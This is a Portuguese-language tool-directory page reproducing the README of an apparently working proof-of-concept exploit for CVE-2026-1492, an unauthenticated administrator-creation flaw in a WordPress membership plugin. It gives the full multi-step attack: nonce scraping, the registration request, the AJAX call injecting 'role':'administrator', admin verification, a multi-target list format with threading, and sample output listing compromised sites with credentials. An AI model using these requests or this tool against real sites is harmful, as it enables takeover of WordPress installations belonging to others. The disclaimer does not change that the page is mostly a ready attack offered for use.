Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-1492 — User Registration & Membership <= 5.1.2 - Escalação de Privilégios não Autenticada via Registro de Associação | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2026-1492
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubnxploited/cve-2026-1492

CVE-2026-1492

User Registration & Membership <= 5.1.2 - Escalação de Privilégios não Autenticada via Registro de Associação

Ver Repositório
2há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-1492

User Registration & Membership <= 5.1.2 - Escalada de Privilégios Não Autenticada via Registro de Associação

Typing SVG


🔴 Visão Geral da Vulnerabilidade

CVE-2026-1492 — Escalada de Privilégios Não Autenticada via Registro de Associação

Descrição:
O plugin User Registration & Membership para WordPress é vulnerável à Escalada de Privilégios Não Autenticada em todas as versões até e incluindo a 5.1.2. A vulnerabilidade decorre do manipulador AJAX user_registration_membership_register_member aceitar um valor de role fornecido pelo usuário durante o processo de registro de associação, sem impor nenhuma lista de permissões ou verificação de capacidade no lado do servidor. Um atacante remoto completamente não autenticado pode criar uma cadeia de solicitações AJAX em múltiplas etapas — primeiro registrando uma nova conta de usuário e depois enviando uma chamada register_member maliciosa com "role": "administrator" injetado no payload JSON members_data — para criar silenciosamente uma conta de Administrador do WordPress com privilégios totais. Isso resulta no comprometimento completo da instalação WordPress afetada, sem exigir nenhuma interação do usuário.


🛠️ Descrição da Ferramenta

Este é um script de exploração Proof-of-Concept (PoC) que implementa uma cadeia de ataque completa com ciência de estado contra sites WordPress que executam uma versão vulnerável do plugin User Registration & Membership. A ferramenta realiza exploração inteligente em múltiplos estágios, com descoberta automática, extração de planos, coleta de nonces, registro em fluxo duplo, injeção de função e verificação de administrador.

🔗 Cadeia de Ataque Completa

root@kitploit:~
[Discovery Phase]
  GET /membership-pricing/  →  Extract membership plan IDs
  GET /registration/        →  Extract form fields, nonces, AJAX params

        ↓

[Registration Phase — Flow A]
  POST /wp-admin/admin-ajax.php
  action=user_registration_user_form_submit
  → Register new user account

        ↓

[Role Injection Phase — Flow A]
  POST /wp-admin/admin-ajax.php
  action=user_registration_membership_register_member
  members_data={"role":"administrator", "membership":"<id>", ...}
  → Inject administrator role into newly created account

        ↓

[Admin Verification Phase]
  GET /wp-admin/  →  Check for admin dashboard indicators
  GET /wp-admin/plugin-install.php  →  Confirm plugin-install access

        ↓

[Fallback Override — Flow B]
  If Flow A admin check fails → repeat with fresh username/email

        ↓

[Write to Nx_admin.txt]
  Format: https://target.com/wp-login.php user:<u> pass:<p>

📋 Requisitos

Requisitos de Sistema

  • Python 3.8 ou superior
  • Linux / Windows / macOS

Dependências Python

root@kitploit:~
pip install requests urllib3 rich

Ou pelo arquivo de requirements:

root@kitploit:~
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

🚀 Instalação

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-1492.git
cd CVE-2026-1492

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-1492.py

⚙️ Uso

Execução Básica

root@kitploit:~
python3 CVE-2026-1492.py

A ferramenta usa uma interface de terminal totalmente interativa desenvolvida com Rich. Todos os parâmetros são solicitados em tempo de execução.


🗂️ Formato da Lista de Alvos

Crie um arquivo de texto simples (padrão: list.txt) com um alvo por linha:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

🖥️ Prompts Interativos

root@kitploit:~
Targets file [list.txt]: list.txt

Credentials:
  - Username prefix: random number is added per site (fresh user per target/plan/flow)
  - Email: if left empty, it will be built from the username automatically
  - Password: fixed for all sites

Username prefix (optional): Nxploited
Email (optional): 
Password [Nx_12999]: Nx_12999
Threads [3]: 5
HTTP timeout (seconds) [10]: 10

🔬 Análise Aprofundada da Exploração

Passo 1 — Descoberta

A ferramenta descobre e analisa automaticamente:

Passo 2 — Registro AJAX

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_user_form_submit
&form_data=[{"field_name":"user_login","value":"Nxploited_A_482910",...}]
&form_id=1
&ur_frontend_form_nonce=<extracted_nonce>
&security=<extracted_security>
&is_membership_active=<membership_id>

Passo 3 — Injeção de Função via AJAX (A Chamada Vulnerável)

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_membership_register_member
&members_data={"membership":"<id>","payment_method":"free","role":"administrator","username":"Nxploited_A_482910",...}
&form_response={...}
&_wpnonce=<membership_nonce>
&security=<membership_nonce>

⚠️ O servidor aceita o campo role vindo do cliente sem nenhuma validação de lista de permissões — esta é a causa raiz do CVE-2026-1492.

Passo 4 — Verificação de Admin

A ferramenta abre uma nova sessão, faz login com as credenciais recém-criadas e verifica:


📁 Arquivos de Saída

Formato de Saída do Admin

root@kitploit:~
https://target.com/wp-login.php user:Nxploited_A_482910|pass:Nx_12999

🖥️ Exemplo de Saída do Terminal

root@kitploit:~
╔══════════════════════════════════════════════════════════════════════╗
║   CVE-2026-1492  |  User Registration & Membership — Admin PoC      ║
║   By: Nxploited  |  GitHub: github.com/Nxploited  |  @KNxploited    ║
╚══════════════════════════════════════════════════════════════════════╝

[INFO]   https://target.com
[OK]     https://target.com  |  REG-A-OK  user:Nxploited_A_482910 mem:3
[OK]     https://target.com  |  MEM-A-OK  membership A (role=administrator payload) sent
[OK]     https://target.com  |  ADMIN-A   user:Nxploited_A_482910 pass:Nx_12999 mem:3

┌─────────────────────────────��───────────────────────────────────────────────┐
│  Target                  │  Status           │  Note                        │
├─────────────────────────────────────────────────────────────────────────────┤
│  https://target.com      │  ✅ ADMIN-A       │  user:Nxploited_A_482910 ... │
│  https://target2.com     │  MEM-B-FAIL       │  membership not configured   │
│  https://target3.com     │  DEAD             │  connection error            │
└─────────────────────────────────────────────────────────────────────────────┘

📊 Referência de Códigos de Status


📡 Contato e Autor

Por: Nxploited (Khaled Alenazi)

 


⚠️ Aviso Legal

ESTA FERRAMENTA É FORNECIDA APENAS PARA FINS EDUCACIONAIS E DE PESQUISA DE SEGURANÇA AUTORIZADA.

O autor, Nxploited (Khaled Alenazi), e todos os colaboradores deste projeto não aprovam, apoiam nem assumem qualquer responsabilidade pelo uso indevido desta ferramenta ou por qualquer dano causado pelo uso deste software contra sistemas para os quais você não tenha autorização explícita por escrito.

  • ✅ Permitido: Uso em sistemas que você possui ou para os quais recebeu permissão explícita por escrito para testar.
  • ❌ Proibido: Uso contra qualquer sistema sem autorização explícita por escrito prévia do proprietário do sistema.

O acesso não autorizado a sistemas de computador é ilegal e punível pelas leis aplicáveis, incluindo, mas não se limitando ao Computer Fraud and Abuse Act (CFAA), ao Computer Misuse Act (CMA) e à legislação equivalente em todo o mundo.

Ao usar esta ferramenta, você assume total e única responsabilidade por suas ações e confirma que tem autoridade legal para testar os sistemas-alvo.

O autor não assume nenhuma responsabilidade por quaisquer danos diretos, indiretos, incidentais ou consequentes decorrentes do uso ou uso indevido deste software.


© 2026 Nxploited (Khaled Alenazi) — Somente para pesquisa de segurança autorizada.

Baixar ferramenta
CampoDetalhes
CVE IDCVE-2026-1492
SeveridadeCRÍTICA — Pontuação CVSS v3.1: 9.8
VetorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
Software AfetadoUser Registration & Membership — Construtor de Formulário de Registro Personalizado, Formulário de Login Personalizado, Perfil de Usuário, Plugin de Restrição de Conteúdo e Associação para WordPress
Versões AfetadasTodas as versões até e incluindo a 5.1.2
Tipo de VulnerabilidadeGerenciamento Inadequado de Privilégios — Criação Não Autenticada de Conta de Administrador
Autenticação NecessáriaNenhuma
CWECWE-269: Gerenciamento Inadequado de Privilégios
AlvoO Que É Extraído
/membership-pricing/IDs dos planos de associação, links da página de registro
/registration/Campos do formulário, nonces, URLs AJAX, campos de rádio da associação
Objeto JS user_registration_paramsajax_url, nonce security, metadados do formulário
ur_membership_frontend_localized_dataNonce específico da associação, endpoint AJAX
EndpointIndicador Verificado
/wp-admin/adminmenu, wp-admin-bar, manage_options
/wp-admin/users.phpusers.php
/wp-admin/plugin-install.phpupload-plugin, plugin-install-tab
ArquivoDescrição
Nx_admin.txt✅ Contas de administrador confirmadas
membership_success_log.txtTodas as chamadas bem-sucedidas de injeção de função de associação
discovery_log.txtDados completos de descoberta por alvo (nonces, IDs, campos)
registration_log.txtTodas as solicitações e respostas AJAX de registro
membership_log.txtTodas as solicitações e respostas AJAX de associação
admin_check_log.txtTentativas de login e resultados da verificação de administrador
StatusCorSignificado
ADMIN-A / ADMIN-B🟢 VerdeAdministrador confirmado — Fluxo A ou B
ADMIN-A-OVERRIDE🟢 VerdeAdmin confirmado após tentativa de substituição
REG-A-FAIL / REG-B-FAIL🟡 AmareloO AJAX de registro retornou falha
MEM-A-FAIL / MEM-B-FAIL🟣 MagentaA chamada de injeção de função de associação falhou
REG-PENDING-A/B⚫ EscuroA conta exige verificação de e-mail ou aprovação do administrador
NO-MEM-ID⚫ EscuroID do plano de associação não encontrado no alvo
NO-UR-NONCE⚫ EscuroNonce de registro não pode ser extraído
NO-ADMIN⚫ EscuroAssociação OK, mas acesso de admin não confirmado
TIMEOUT⚫ EscuroTempo limite de HTTP
DEAD⚫ EscuroErro de conexão — site inacessível
ERROR🔴 VermelhoExceção inesperada